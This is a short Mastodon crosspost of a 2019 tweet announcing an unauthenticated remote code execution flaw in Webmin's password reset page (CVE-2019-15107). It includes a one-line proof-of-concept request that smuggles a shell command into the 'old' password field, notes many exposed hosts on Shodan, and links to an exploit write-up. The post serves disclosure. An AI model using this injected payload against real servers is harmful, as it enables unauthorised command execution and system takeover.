Z0vsky: "RT @shishi0_@twitter.com "Webmin 0day remote cod…" - Mastodon

Z0vsky @z0vsky@mastodon.tedomum.net

RT @shishi0_@twitter.com

"Webmin 0day remote code execution"

Tl;Dr: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan.

PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

🐦🔗: https://twitter.com/shishi0_/status/1162694712177954819

Aug 18, 2019, 01:12 · · Mastodon Twitter Crossposter · · ·

Sign in to participate in the conversation